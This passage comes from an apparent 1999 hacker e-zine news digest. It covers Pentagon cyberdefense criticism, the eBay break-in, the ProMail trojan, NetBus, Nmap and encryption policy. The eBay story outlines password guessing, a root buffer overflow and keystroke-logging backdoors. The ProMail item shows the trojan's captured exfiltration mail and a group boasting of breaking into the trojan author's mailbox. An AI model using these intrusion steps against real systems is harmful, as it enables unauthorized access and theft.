but the Army, Navy and other services need a single-standard computer system. ''Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again,'' said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. The report recommended: Making C4I a greater budget priority in defense spending, with a flexibility that can ''exploit unanticipated advances in C4I technology.'' Designating an organization responsible for providing direct defensive operational support to commanders. Funding a program to conduct frequent, unannounced penetration testing of C4I systems. Ensuring that programs are operable even if one part has been penetrated by an adversary. Emphasizing the importance of information technology in the military leadership. Establishing an Institute for Military Information Technology, possibly as part of an existing body. ------------------------------------------------------------ -------------------- ShadowVrai http://shadowvrai.evil.nu ______________________ "Did you really think you could call up the devil and ask him to behave?" __________ _____________________________________________ Get your free personalized email address at http://www.MyOwnEmail.com @HWA 15.0 International raid cracks child porn ring ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9903/19/germany.porno.reut/index.html International raid cracks child porn ring March 19, 1999 Web posted at: 5:35 p.m. EST (2235 GMT) MUNICH (Reuters) -- German police said on Friday they had cracked an international Internet child pornography ring after launching a coordinated sweep through seven countries. In a raid of private homes coordinated from Munich, German police said they had confiscated thousands of outlawed photographs and video images which had been traded and distributed via Internet "chat rooms." German police said the action, codenamed "Bavaria," had taken place on Wednesday and involved simultaneous raids of suspects' homes in Germany, Switzerland, Sweden, Britain, Norway, the United States and Canada. Holger Kind, an official from the Federal Crime Office, said the material uncovered had been the widest sweep of its kind led from Germany. "You can assume this will not be the last raid of its kind," Kind told a news conference. Kind said some suspects had already confessed to involvement in the ring. If convicted in Germany, the suspects could face a prison sentence of up to five years in jail. Switzerland and Britain have arrested one suspect each. Police in Sweden and the United States also found banned material in the raids featuring children between the ages of three and four, police in Bavaria said. @HWA 15.1 ACPM : Anti-Child Porn Militia wants YOU ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Anti Child Porn Militia contributed by system.administrator The Anti Child Porn Militia is recruiting new members. They are asking for anyone who thinks they can be of assistance in eliminating child pornography from the internet to assist them. http://infovlad.net/ACPM/ From the ACPM site; We pray for children who are sick. children who may not live to see their next birthday.... or tomorrow, children who go into hospitals, never to come out children who don't deserve to die. We pray for the children that don't understand why...... why they're not like other children who are healthy children who play in the sunlight dance on the grass, children who enjoy life children that don't think about death. We pray for children who stare at photographers from behind barbed wire, who can't run down the street in a new pair of sneakers, who are born in places we wouldn't be caught dead in, who live in an X-rated world. We pray for those children who never get dessert, who have no security blanket to drag behind them, children who watch their parents watch them die. children who can't find any bread to steal, children who don't have any rooms to clean up, whose pictures aren't on anybody's dresser, whose monsters are real. We pray for children whose nightmares come in the daytime, children who will eat anything, who have never seen a dentist, who aren't spoiled by anybody, children who go to bed hungry and cry themselves to sleep. who live and move but have no being. We pray for children who want to be carried, and for those who must be. For those who never get a second chance. We pray for those children who will grab the hand of anybody kind enough to offer it. For these children we pray. - unknown - 'Hackers wanted:' http://infovlad.net/ACPM/signup.html Only sign up if you have some skills and time to help out don't sign up for bragging rights, you won't be doing anyone any favours... - Ed @HWA 16.0 Hacking contest, win a Netfinity server! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking Contest from HNN contributed by ju PC Intern, a german Computer magazine is sponsoring a contest to draw attention to web server security. They have set up a WindowsNT and a Linux system with a hidden file. First person to get the file wins an IBM Netfinity-server. Try your skillz. PC Intern: http://www.pcintern.de/hacker.htm * Welcome to the Web-Hack! * We wish all participants good luck! * Look for "hack.txt", please! * This is the wayto the Linux-Server: IP: 195.227.43.210 * This is the way to the Windows-NT-Server: IP: 195.227.43.211 Is there optimal protection? The editorial staff of the German computer magazine PC INTERN wants to draw attention to security of data in web-server-systems in an outstanding contest. The hack-event aims at checking and discussing the reliability of Windows-NT- and Linux-PCs' security. Starting at 9.00 am on Thursday 18th, 1999, you will find two links on this site which will lead to the servers to be hacked. On both servers there is hidden a telephone-number and a password. The person who will call first telling the password and the way he or she hacked the server, wins an IBM Netfinity-server. PC INTERN grants the hackers total exemption from punishment - PC INTERN's single aim is to expose and discuss the security's weak spots. On IBM's stage (hall 2, D28) between 1.00 and 2.00 pm, a debate will finish the web-hack-event. Dr. Harald Feldkamp, editor in chief, will discuss about security in the world wide web with the following participants: Dr. Werner Schmidt Ministerialrat beim Bundesbeauftragten f�r den Datenschutz Wilfried Seiffert Ministerialrat beim nieders�chsischen Landesbeauftragten f�r den Datenschutz Frank Kertscher Principal IT Security f�r IBM Global Services Klaus Birkenbihl GMD Informationstechnik GmbH Tilmann M�ller-Gerbes Leiter Professional Services bei S.u.S.E. Felix H�ger Gesch�ftsf�hrer der NDH Netzwerkdienste H�ger @HWA 17.0 eBay owned ~~~~~~~~~~ http://www.ebay.com MagicFX cracks eBay contributed by Code Kid According to MagicFX eBay has been owned for quite some time. To prove this on March 13th he replaced the main web page on one of the servers for a journalist to confirm. The article goes into detail on just how badly eBay is owned. Forbes; http://www.forbes.com/tool/html/99/mar/0319/side1.htm Going once, going twice ... HACKED! By Adam L. Penenberg EBay(nasdaq: EBAY), the hot one-to-one auction site, was hacked on Saturday March 13 by a 22-year old college student who goes by the handle MagicFX. But the story doesn't end there. The hacker maintains access to the site and can return at will. He has "root" access to eBay's computers, the same kind the legitimate administrators enjoy. This means he could change prices or place fake ads, divert traffic to other sites or even take down the entire network. This was starkly illustrated to this reporter on Wednesday night, when the hacker, to prove his point, took down eBay's home page for two minutes and replaced it with the message: Proof by MagicFX that you can't always trust people� not even huge companies. (who woulda known that?) "It's 9:30 PM . . . do you know who has YOUR credit card information?" Although eBay customers don't use credit cards to pay for merchandise--the site acts as a middleman--sellers use them to pay the company service fees. When contacted, the company refused to comment, saying that unnamed law enforcement officials had requested that eBay remain silent about issues surrounding hacking. Initially, the hacker, who would not divulge his real name, gained access to eBay's computers on Saturday afternoon by figuring out what accounts existed, then trying simple passwords. Since eBay is an e-commerce site, MagicFX tried words like "commerce," "trading" and "eBay," until he cracked one, although he would not divulge the password he used. He says he was surprised eBay's technicians didn't use standard password protecting schemes, which would have meant a mixture of numbers and letters. Once inside, MagicFX employed a technique referred to as a "local root buffer overflow." He ran a script that transmits too much information into a targeted zone. The data that can't fit is then manipulated so that he was able to trick the computer into running his commands at an elevated privilege. "I exploited a buffer overflow condition, which existed in an SUID root program," says the hacker, who is finishing up a B.S. in computer science. "Then I used software which I had written myself to get to the rest of the network. FreeBSD was the first machine I accessed, the rest were Solaris." From there, MagicFX modified the system's software so that instead of providing administrators with a secure way to work from a remote machine, it logged that information to a hidden file, so that not only could he intercept passwords and log in names, but actually watch everyone's keystrokes. "After gaining access to more of the network, I tried to figure out how the service worked. Most of the web servers run on Windows machines, which use the SMB protocol to load a template page off a specified machine and dynamically create the HTML." For Saturday's hack, MagicFX left his page up for about 45 minutes; he claims it was viewed by about 4,000 site visitors. (Hackers often attack on weekend evenings, because most system administrators are out of the office.) The reason more people didn't witness the hack is that eBay deploys several web servers and balances the load based on the amount of traffic. Since MagicFX exploited only one machine for the web page hack, only users served by that machine could view the hacked page. But he claims the company must know about the hack, since he monitored E-mails from users alerting the company. He pulled his own page down and logged off when he spotted a system administrator--"to be nice." Mirrors--or copies--of both Saturday's and Wednesday's hacked eBay pages have been archived by Brian Martin, a computer security consultant, on his site attrition.org (http://www.attrition.org/mirror/attrition/ebay.com) What does MagicFX say about eBay's security? "I think they have better security than NASA, but that's not saying much." Martin, who also witnessed the Wednesday night eBay hack, says, "Large systems like eBay are focused on keeping the money machine running smoothly, but this has come at the expense of security. Users should realize that just because a site says their personal information and credit card numbers are secure doesn't necessarily make it so." MagicFX says he hacked eBay, which has a market cap of more than $18 billion, because he wanted to see how a large e-commerce site worked from the inside. Once there, he discovered an added bonus: eBay uses a proprietary system to do its trading, he says, and the source code is highly prized in the hacker world. As a result, a number of hackers have approached him for a copy, but he has not complied,, since he hasn't had a chance to sift through it yet. This was not the first hack for MagicFX. Recently he also defaced web sites promoting the movies Varsity Blues and 200 Cigarettes, "because they got a lot of hits and I didn't like the movies really." He also hit monicalewinsky.com because it is "anti-Clinton" and "ourfirsttime," a site that claimed it would webcast a man and woman losing their virginity. MagicFX says he hacked the site to get the word out it was a media hoax. "I have learned at least as much by hacking as I have in school," he says. External link: attrition.org @HWA 18.0 Aussies to ban Net pr0n ~~~~~~~~~~~~~~~~~~~~~~~~ From The Australian http://technology.news.com.au/techno/4317712.htm Alston's regime to ban Net nasties By WAYNE ADAMS and DAN TEBBUTT 20mar99 COMMUNICATIONS and Information Technology Minister Richard Alston has unveiled a regime that will effectively ban X-rated and Refused Classification material from the Internet. "There's no doubt the Internet provides enormous educational and informational opportunities but, at the same time, it does pose considerable risks for the community," he said yesterday. "We are therefore proposing to introduce a new regime that will hopefully ensure, certainly for Internet sites hosted within Australia, that we block access to material that is either illegal, Refused Classification or X-rated and, in relation to R-rated material, is only available to those over 18 years of age." The Australian Broadcasting Authority will oversee the regime. Community and Internet industry groups will be included under the proposals. They will provide a "hotline" on offensive material and pass information to the ABA, monitor online sites, advise on complaints mechanisms and provide community education. If the ABA thinks content is serious enough, it will be able to prevent access to the material pending a National Classification Board opinion. The authority will have to issue a notice to a service provider to halt access to any content deemed to be proscribed content. Senator Alston rejected suggestions that the announcement was related to the Telstra sale or appeasing Independent senator and morals campaigner Brian Harradine. "Senator Harradine is probably the most visible public manifestation of concern, but the fact is that there are many hundreds of thousands of people in Australia who would have the greatest concern if they thought that under-age children could have access to illegal or highly offensive material," he said. However, Labor's communications spokesman, Stephen Smith, said Senator Harradine and parents "should not be duped". "The announcement today is about Australian content, and it's a very small proportion of Internet content which is locally produced and locally put online," he said. Kimberley Heitman, chairman of Internet advocacy group Electronic Frontiers Australia, said: "This is as bad as it gets � they have ignored everything the Internet industry has said. None of these things will affect end users. It will just drive content offshore." @HWA 19.0 More on the Promail email trojan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Originally reported in the last issue, here's more info from packetstorm on the Promail email trojan program. Date: Fri, 19 Mar 1999 09:41:18 +0100 From: Aeon Labs <aeon@army.net> To: packetstorm@genocide2600.com Subject: security/privacy news (Perhaps this might be of interest to Your readers.) ProMail v1.21, an advanced freeware mail program spread through several worldwide distribution networks (SimTel.net, Shareware.com and others), is a trojan. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. ALL of the personal user data, including the user's password in encrypted format, is sent to an account on NetAddress - a free email provider - as soon as a valid internet connection is detected. Apart from this "feature", the software is 100 % functional and very well done. Well, it seems that 1999 is the worst year for privacy... More detailed information can be found on our web site at http://cool.icestorm.net/aeon/news.html --------------------------------------------------------------------- Aeon Labs http://cool.icestorm.net/aeon [http://cool.icestorm.net/aeon/news.html] 03.99] ProMail v1.21, an advanced freeware mail program for Windows 95/98, is a trojan. It has been spread through several worldwide distribution networks (SimTel.net, Shareware.com and others) as proml121.zip. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. The executable, which appears to have been created with Borland Delphi, has been packed with Petite (a shareware Win32-EXE compressor) and then "hexed" to make disassembly harder. ProMail v1.21 supports multiple mailboxes; every time a new mailbox is created, an "ini" file containing the users full name, passwords, email addresses, servers and more is generated. Prior to doing any other action, the program performs a check for a valid network connection which, if found, allows for the sending of ALL of the personal user data, including the user's password in encrypted format, to an account on NetAddress - a free email provider. Apart from this "feature", the software is 100 % functional and very well done. For further information or a more detailed analysis contact us. <aeon@army.net> --------------------------------------------------------------------------------- Date: Sat, 20 Mar 1999 03:51:00 -0500 (EST) From: aeon@army.net To: packetstorm@genocide2600.com Subject: Re: your mail currently our members have disassembled and analyzed the whole executable. the only thing it appears to do as a trojan is to send the accounts data entered by the user: full name, organization, email address, user name, password (encrypted), smtp and pop3 servers, etc. and since promail supports multiple accounts, each newly created account is sent. the data for each account is contained in a text file which is used to initialize promail at run-time. the same text file is used as body of the email which is sent to the author (supposedly) of the program. it appears that all emails are sent with same subject line: "kirio". the program also creates the file promail.pml in its directory. it's a zero length file used as permanent flag to "remember" to the trojan that one or more accounts data could not be sent in the last session (for example, when accounts are created off-line, or when not followed by a mail check in the same session). we also managed to crack the mailbox to which accounts data is sent. about ~80 emails (== accounts) were found and another dozen was received after only ten minutes or so. accounts for microsoft, michigan us army, old bridge chemicals and a videogames company - amongst the others - were found. we have merely informed a _contact_ (not the ml) in ntbugtraq and several "underground" news/security sites. well you can contact the various *traq mailing lists if you want. we don't care if people still trust anything that can be downloaded from the net anyway. i guess we're not exactly "white hat" hackers :P if you need any help or further analysis on a specific part of the program please feel free to contact us. ------------------------------------------------------------------------ Aeon Labs <aeon@army.net> http://cool.icestorm.net/aeon --------------------------------------------------------------------------------- Date: Sun, 21 Mar 1999 09:40:26 +0100 From: Patrick Oonk <patrick@pine.nl> To: tattooman@ADRIC.GENOCIDE2600.COM Subject: [patrick@pine.nl: ProMail trojan proof] ----- Forwarded message from Patrick Oonk <patrick@pine.nl> ----- Hi, I've tested the ProMail Trojan, it sends the info to naggamanteh@usa.net using the smtp server you supply when creating an account. I'll Cc: abuse@usa.net and bugs@shareware.com ProMail can still be downloaded at many sites, just check http://search.shareware.com/code/engine/File?archive=sim-win95&file=email%2fproml121%2ezip&size=409141 These are the queue files at my smtp server after I installed ProMail and created an account: $ more /var/spool/mqueue/qfPAA17183 V2 T921939650 K921939657 N1 P30435 I6/0/88205 M<naggamanteh@usa.net>... reply: read error from office.pine.nl. Fb $rSMTP $sfoo $_foo.domain.com [10.0.0.1] S<patrick@pine.nl> RPFD:<naggamanteh@usa.net> H?P?Return-Path: <patrick@pine.nl> HReceived: from foo (foo.domain.com [10.0.0.1]) by bar.domain.com (8.9.1/8.9.1) with SMTP id PAA17183 for <naggamanteh@usa.net>; Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?D?Date: Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?F?From: patrick@pine.nl H?M?Message-Id: <199903201420.PAA17183@bar.domain.com> HTo: naggamanteh@usa.net HSubject: kirio $ more /var/spool/mqueue/dfPAA17183 Name=New Account [From] EMail=patrick@pine.nl Name=Patrick Oonk Organization=Pine Internet B.V. [ReplyTo] EMail=patrick@pine.nl Name=Patrick Oonk [POP3] Server=pop.domain.com Port=110 User=patrick Password=1hFATUIxWOkJ3b3N3chBXZrFmZMUE PromptPassword=0 DoPOP=1 StandardDownload=0 [SMTP] Server=smtp.domain.com Port=25 DoSMTP=1 [Filter] Keep= Delete= -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : ----- End forwarded message ----- -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : : A signature starts with "-- <enter>". : --------------------------------------------------------------------------------- Date: Mon, 22 Mar 1999 18:20:50 +0900 (JST) From: Aeon Labs <aeon@army.net> To: packetstorm@genocide2600.com Subject: ProMAIL users So far we have collected hundreds of email *addresses* from naggamanteh@usa.net (only the headers were retrieved, we don't want their passwords/personal data/etc). With these addresses, users of ProMail could be warned about the problem with their passwords. If you can find people who are willing to do the work, we'll send you a list of the addresses we have collected. ----------------------------------------------------------------------------- Aeon Labs <aeon@army.net> http://cool.icestorm.net/aeon 20.0 C41 - Pentagon�s cyberdefenses criticized ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pentagon�s cyberdefenses criticized Report: Threats aren�t taken seriously enough by HQ, troops MSNBC STAFF AND WIRE REPORTS WASHINGTON, March 22 The military�s key communications infrastructure is dangerously vulnerable to attacks from cyberspace and requires urgent changes, according to a new study ordered by Congress and sponsored by the Pentagon. One avenue the Pentagon was advised to consider was a change in policy that would allow it to counter -attack when a cyberattacker strikes. THE COMMAND, Control, Communications, Computers and Intelligence systems - known as C4I - is compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, a National Research Council committee reported."The rate at which information systems are being relied on outstrips the rate at which they are being protected," it said. "The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack." It also suggested the Pentagon consider whether "counter-attack is an appropriate response to a cyber attack." As U.S. policy now stands, the Pentagon may not go after cyber attackers, instead handing off investigations to civilian law enforcement agencies. Despite evidence of security lapses in C4I - which handles communications and warning tasks along the chain of command - the Pentagon's "words regarding the importance of information systems security have not been matched by comparable action," the report said. MANAGEMENT CRITICIZED "Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense," said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government. The committee said it observed one military field exercise in which personnel in an operations center mistakenly took as a joke a cyber attack on their systems. The report indicated the problems were due more to the Pentagon 's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress. PENTAGON'S RESPONSE In a statement, the Pentagon acknowledged that the military's strength "is our information technology," and that "our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well." It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel. But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of "Industrial Age" military acquisition policies - applying to computers as well as tanks, ships and aircraft - that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system. "Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again," said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. RECOMMENDATIONS The report recommended:making C4I a greater budget priority in defense spending, with a flexibility that can "exploit unanticipated advances in C4I technology." Designating an organization responsible for providing direct defensive operational support to commanders. o Funding a program to conduct frequent, unannounced penetration testing of C4I systems. o Ensuring that programs are operable even if one part has been penetrated by an adversary. o Emphasizing the importance of information technology in the military leadership. o Establishing an Institute for Military Information Technology, possibly as part of an existing body. An archive audio copy of the Senate hearing is available via the FedNet service at www.fednet.net/h0322b.htm. MSNBC�s Miguel Llanos and The Associated Press contributed to this report. @HWA 21.0 [ISN] NetBus 'Trojan' Splits Security Community ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NetBus 'Trojan' Splits Security Community (03/02/99, 7:46 p.m. ET) By Lee Kimber, Network Week Internet-connected networks could be left vulnerable to Trojan attacks because leading anti-virus software vendors have said they won't scan and disable a new, more powerful NetBus Trojan. Remote-control programs like NetBus were dubbed Trojans because they could be hidden on computers by crackers. The latest version of NetBus has split network-security experts because its author said it was not a Trojan as it remained visible. But crackers reportedly rewrote it to make it invisible within days of its launch. Data Fellows and Sophos said their anti-virus products would not disable the recently launched remote-control Trojan NetBus 2 Pro because its Swedish author Carl-Fredrik Neikter was a professional who now charged $12 for a legitimate shareware product. "NetBus 2.0 Pro is not detected as it is now commercial software," according to a spokesman for Data Fellows' European office in Finland. "NetBus 1.x up to 1.7 was detected by anti-virus scanner F-Secure but not NetBus 2.0" Data Fellows' website reported that earlier NetBus versions were used frequently to steal data and delete files on people's machines. NetBus lets crackers to take remote control of networked PCs, but publicity over its spread has been eclipsed by the Back Orifice remote-control Trojan written by hacker group Cult of the Dead Cow. But unlike Back Orifice, NetBus can infect Windows NT machines and is more easily configured. And Neikter described it himself as a "remote administration and spy tool." His promotional material also mentioned NetBus provided the ability to change files and registries. Neikter could not be contacted for comment. Sophos confirmed it also would not offer NetBus support. "It is a commercial product and it looks extremely professionally written. You can use these products for lawful or unlawful purposes," said Jan Hruska, Sophos technical director. He added Sophos products did not scan for earlier versions of NetBus but the company would make a scanning tool available that people could use if they want to. But rival vendor Network Associates said it believed NetBus was aimed at young crackers and joined with other vendors to commit to detecting and removing the Trojan in Dr Solomon's and McAfee anti-virus products. "We're carrying on detecting it," said the company's anti-virus consultant Jack Clark. "We don't believe a commercial application would have a section in the manual that says 'have fun with your friends' and has the ability to pop out the CD tray on users' machines," he added. And asked if Symantec would update its software to detect the Trojan, Symantec technical manager Kevin Street replied: "Absolutely. We've already got it sorted out, so why would we remove it?" -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 22.0 [ISN] Cracking tools get smarter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles <erehwon@kizmiaz.dis.org> http://www.wired.com/news/print_version/technology/story/18219.html?wnpg=all [Wired.com] (3.3.99) With awe and alarm, security analysts have observed the capabilities of Nmap, a network-scanning program that crackers are now using to plot increasingly cunning attacks. "Just before Christmas, we detected a new [network] scanning pattern we'd never seen before," said John Green, a security expert on the "Shadow" intrusion-detection team at the US Navy's Naval Surface Warfare Center. "Other sites have seen the same activity. The problem was, no one knew what was causing it." Green made the remarks Tuesday in an online briefing hosted by the SANS Institute, a nonprofit network-security research and education organization. The group held the briefing to alert network administrators of the alarming increase in the strategies of network attacks. The culprit software prowling outside the doors of networks participating in the study is Nmap, an existing software utility used by administrators to analyze networks. In the hands of intruders, security analysts discovered, Nmap is a potent tool for sniffing out holes and network services that are ripe for attack. The analysts didn't look for actual damage that was carried out. Instead, they silently watched as various networks were scanned by untraceable Nmap users. "The intelligence that can be garnered using Nmap is extensive," Green said. "Everything that the wily hacker needs to know about your system is there." Rather than feel in the dark to penetrate network "ports" at random, Nmap allows intruders to perform much more precise assaults. The implications are a bit unnerving for the network community. The tool makes planning network intrusions more effective, while simultaneously bringing this sophistication to a wider audience of hackers. "It takes a lot of the brute force out of hacking," said Green. "It allows [intruders] to map hosts and target systems that might be vulnerable." And that should result in a higher success rate for attempted intrusions. "I think we're going to see more coordinated attacks. You can slowly map an entire network, while not setting off your detection system," said software developer H. D. Moore, who debriefed network analysts at the conference. But Moore is part of the solution. He authored Nlog, software that automatically logs activity at a network's ports and parlays it to a database. Weekly checks of the database enable the user to tell if someone is performing an Nmap analysis. Nlog serves as a companion tool to Nmap. Just like intruders, administrators can use Nmap to detect their own network weaknesses, then plug the holes. Prevention is the only defense, Green and Moore said. There is no other known way to combat an Nmap-planned network attack. "Right now it's basically a suffer-along scenario," Green said. But, at least, Nmap lets administrators "know what the hackers know about you." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 23.0 [ISN] British Defense Ministry Dismisses Hacker Report ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN list; Forwarded From: jei@zor.hut.fi http://nt.excite.com/news/r/990303/12/tech-hackers British Defense Ministry Dismisses Hacker Report (Last updated 12:21 PM ET March 3) LONDON (Reuters) - Britain's Defense Ministry Wednesday dismissed as "not true" a newspaper report that said hackers had seized control of one of its military communications satellites and issued blackmail threats. The Sunday Business newspaper had said the intruders altered the course of one of Britain's four satellites used by defense planners and military forces around the world. "There is no basis to the story whatsoever," said a Defense Ministry spokesman. "It's not true." Security sources cited by the newspaper said the satellite's course was changed just over two weeks ago. The hackers then issued a blackmail threat, demanding money to stop interfering with the satellite. A police spokesman said the story was for the Defense Ministry to investigate. "Military security is a matter for the Defense Ministry," he said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 24.0 [ISN] Encryption key would lock up criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Fearghas McKay <fm@mids.org> Originally From: Yaman Akdeniz http://news.bbc.co.uk/hi/english/sci/tech/newsid_289000/289139.stm Tuesday, March 2, 1999 Published at 17:18 GMT Encryption key would lock up criminals Dr Ross Anderson: "Big business can look after itself." By Internet Correspondent Chris Nuttall Cyber-criminals would be caught if the government introduced a system where the keys to coded e-mail were voluntarily lodged with licensed authorities, according to the UK National Criminal Intelligence Service (NCIS). NCIS was one of the groups appearing before the House of Commons on Tuesday. "Criminals are lazy, greedy and they make mistakes," John Abbott, NCIS Director General told the Trade and Industry Select Committee, which is hearing witnesses on electronic commerce issues. "We are able to capitalise on this and we anticipate that a licensing scheme would allow us to have some successes," said Mr Abbott. Civil liberties campaign Civil liberties groups are campaigning against "key escrow" - the term used for lodging codes with a third party. They do not want it included in a forthcoming Electronic Commerce Bill. A long-awaited consultation paper on the bill from the Department of Trade and Industry (DTI) is expected in the next few days. Opponents argue the proposed voluntary licensing system where Trusted Third Parties (TTPs) would hold the keys to encrypted data being sent over the Internet would never be used by criminals. But an NCIS spokesman, who declined to be identified, told the hearing that just as criminals used telephones at every level for their activities, so some would use the TTPs. "We would prefer to have a mandatory licensing system because that would be more inclusive," said Mr Abbott. "I do recognise that we are moving into new territory, and this would not be a complete answer, and if all that is on offer is a voluntary scheme then that is better than no scheme at all." Real time access The Chief Investigations Officer of HM Customs & Excise, Richard Kellaway, told the hearing that real-time access was needed to encrypted data. Mr Abbott added that it was no use knowing three days afterwards where a consignment of drugs had been exchanged. He admitted that key escrow would not solve the problem of crimes being committed on an international scale over the Internet. "But I would urge the government to lead. Law enforcement agencies throughout the world are extremely concerned with developments. We anticipate the problem will grow over time and certainly the G8 law enforcement forum are constantly discussing this and looking for ways forward." Business concerns Businesses, as well as civil liberties campaigners, have voiced concern at the possible proposals on key escrow, and the Post Office stated its opposition at the hearing. Jerry Cope, its managing director for strategy, said there were two areas of concern: "If people feel this system makes them less secure then they will not want to use it. We need to instil confidence. "Then there is the additional cost of regulation and if it is greater than in France or Ireland then business will go elsewhere. It is as easy to send e- mail from London to Manchester via Paris as it is direct from London to Manchester." Mr Cope said there had been a lack of dialogue between business and law enforcement agencies and he suggested a possible compromise. Agencies would bear the additional costs of being able to extract information from TTPs and would only exercise their powers when there was a threat to national security. The Post Office will announce later this month that it is launching a Trusted Third Party service called ViaCode. Red flag The final witness of the day, a leading encryption expert, Dr Ross Anderson of Cambridge University, compared key escrow to the red flag that had to be waved in front of the first motor cars to warn people of danger. A week after the requirement was removed, there was the first road traffic fatality. But no-one would suggest we go back to the red flag today and the assumption is made by the police that 99% of those on the road are good guys, he said. He added that the police had a long way to go with computers to match their current knowledge of the motor car. They had often had to call in outsiders such as himself to help with encryption cases. "There are many, many ways of attacking computer systems and inevitably TTPs are going to be compromised," he said. "The role of government should be protecting the consumer - big business can look after itself." He said the best way forward in terms of legislation was the Australian approach that simply recognised that electronic signatures had the same force as manuscript signatures. "Key escrow would have to be global to achieve its stated purpose, and there is now no prospect of this," he said in an additional written submission to the committee. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 25.0 [ISN] Crypto: Under lock and key ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: privacy <anon@juno.com> http://www.newscientist.com/ns/19990306/forum.html Under lock and key By Duncan Graham-Rowe GOVERNMENTS hate things going on that they don't know about. Not long ago, many governments insisted that they should have the ability--and the right--to decipher all coded messages. The US government, for example, tried to get organisations to use its clipper chip for encryption. Only the government, of course, would hold the numbers, or keys, that would enable it to read anything encoded by the chip. Encryption looked set to become a major civil liberty issue. The subject might seem somewhat esoteric. Indeed, many people have never even heard of it. But whether you know it or not, you almost certainly depend on computer encryption already. Banks, for example, use encryption software to safeguard their customers' personal identification numbers, or PINs. Many other businesses, and individuals, also have good reasons for wanting to be sure that information such as a credit card number sent over the Internet is not being intercepted--or at least cannot be read if it is. Human rights organisations, for example, often use cryptography to relay sensitive information. People who send coded messages obviously want to use strong encryption software, the best available. And while there is no such thing as an uncrackable code, strong encryption comes pretty close. Even with the fastest supercomputers, it could take years to break most properly encoded messages. And this is what gets governments so worried. Strong encryption makes eavesdropping on other people's communications practically impossible. Many governments argue that being able to decode encrypted messages is essential if they are to crack down on criminal activity, such as the distribution of child pornography on the Internet. As a result, a number of Western governments, including France, Britain and the US, have spent years quietly trying to introduce various versions of what is called key escrow. The idea is that government approved agencies, called "trusted third parties", would be set up to hold the encryption keys on our behalf. Then, when the police want to decode a particular message or set of communications, they would present a warrant to these agencies. It sounds reasonable, but such a system would be open to abuse and far from secure. Besides favouring encryption systems that are easy to crack, key escrow represents a weak link in what would otherwise be an almost impenetrable chain. Worse still, it wouldn't even achieve what it was designed for. If key escrow was in place, few criminals would be stupid enough to use it. In fact, criminals would probably be the only ones with any real privacy. And while all those whose job it is to fight crime argue that this would nevertheless provide a good way of flushing out criminals, to do this effectively you would have to know where to look in the first place, which is a somewhat circular argument. So is it really worth jeopardising our privacy on the off chance that the police might catch a few careless criminals? Not according to the French. Last month, France denounced its own well-established policy of banning commercial encryption, after 200 companies complained to the government about key escrow. Prime Minister Lionel Jospin openly admitted that key escrow was useless in fighting crime and therefore unwarranted. And even the US seems to be backing down, after a spate of TV commercials aimed at embarrassing the government brought the issue out in the open. It also seems likely that export laws will be relaxed so that strong encryption software such as Pretty Good Privacy (PGP) is no longer classified as munitions and banned from export. Britain's Department of Trade and Industry seems to be following suit. After nearly five years of consultation, the e-commerce bill is rumoured to be published this week. Although the official line has been that the government favours key escrow, euphemistically calling it a voluntary system of cryptography, the message that this is unacceptable appears to have been drummed home not just by industry bodies but also, according to popular rumour, by the former trade minister Peter Mandelson. This is a welcome change of heart. It is just a pity that it has come not from governments recognising the futility of key 